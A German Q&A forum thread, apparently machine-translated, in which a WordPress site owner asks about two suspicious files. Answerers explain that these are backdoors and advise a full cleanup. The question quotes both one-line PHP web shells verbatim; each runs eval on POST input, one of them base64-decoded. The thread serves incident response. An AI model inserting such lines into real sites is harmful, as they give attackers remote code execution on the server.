web-dev-qa-db-de.com

Verdächtige Dateien

Hallo, ich habe zwei verdächtige Dateien auf meiner Website gefunden:

  1. Der erste in meinem Thema (404.php), mit dieser Zeile hinzugefügt

    <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>

  2. Der zweite in /wp-admin/ heißt wp-class.php.

    Die einzige Zeile dort war: <?eval($_POST[joao]);?>

Kann mir jemand sagen, was diese tun und welche Schritte ich unternehmen soll?

1
qaedus
  1. Wenn jemand eine POST -Anforderung mit einer Variablen php und einem Base-64-codierten Wert sendet, der PHP Code ist, nachdem er decodiert wurde, wird dieser PHP Code mit den Berechtigungen ausgeführt aller Ihrer eigenen PHP Dateien. Der Angreifer kann den gesamten Datenbankinhalt lesen, neue Benutzer erstellen, Dateien hochladen ...

  2. Der zweite Code macht dasselbe, nur ohne das PHP zu kodieren.

Beide Injektionen sind eher primitiv; Sie sehen fast so aus, als ob sie gefunden werden sollten , damit Sie sich sicher fühlen, wenn Sie sie entfernen.

Es ist sehr wahrscheinlich, dass diese Schnipsel nicht die einzigen Probleme sind. Der Angreifer hat seine neue Site wahrscheinlich benutzt und einige Dateien hinzugefügt. Lesen Sie Überprüfen, ob ich einen WordPress-Hack vollständig entfernt habe und befolgen Sie alle dort genannten Vorschläge.

Finde die Hintertür. Lesen Sie Ihre Protokolldateien, wenn sie noch nicht gefährdet sind.

3
fuxia

Diese Codezeilen sind mit ziemlicher Sicherheit bösartig. Um den Webmaster daran zu hindern, nach Zeichenfolgen zu suchen, werden böswillige Inhalte häufig in einem verschlüsselten Format wie base64 versteckt.

Nach meiner Erfahrung gibt die häufigste Version dieses Angriffs einen versteckten Iframe aus, der eine externe schädliche URL lädt (die für eine Reihe von Zwecken verwendet werden kann).

Scannen Sie Ihre Site mit Quttera (intern) und Sucuri (extern) und Überprüfen Sie, ob Sie alle Instanzen des Angriffs identifizieren und entfernen können.

0
Orun